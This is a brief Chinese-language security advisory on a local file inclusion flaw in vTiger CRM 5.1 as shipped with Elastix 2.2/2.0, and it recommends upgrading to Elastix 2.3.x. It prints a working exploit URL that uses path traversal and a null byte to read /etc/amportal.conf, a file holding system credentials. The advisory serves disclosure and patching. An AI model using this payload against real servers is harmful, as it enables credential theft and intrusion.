影響的系統:VtigerCRM 5.1 (包含 Elastix 2.2/2.0)
漏洞的起因:PHP 檔設計漏洞
漏洞的危害:
攻擊者只要瀏覽以下特定網址,就能讀取所有系統檔案的內容。
https://your.elastix.server/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/amportal.conf%00
相關連結:
解決方案:升級 Elastix 至 2.3.x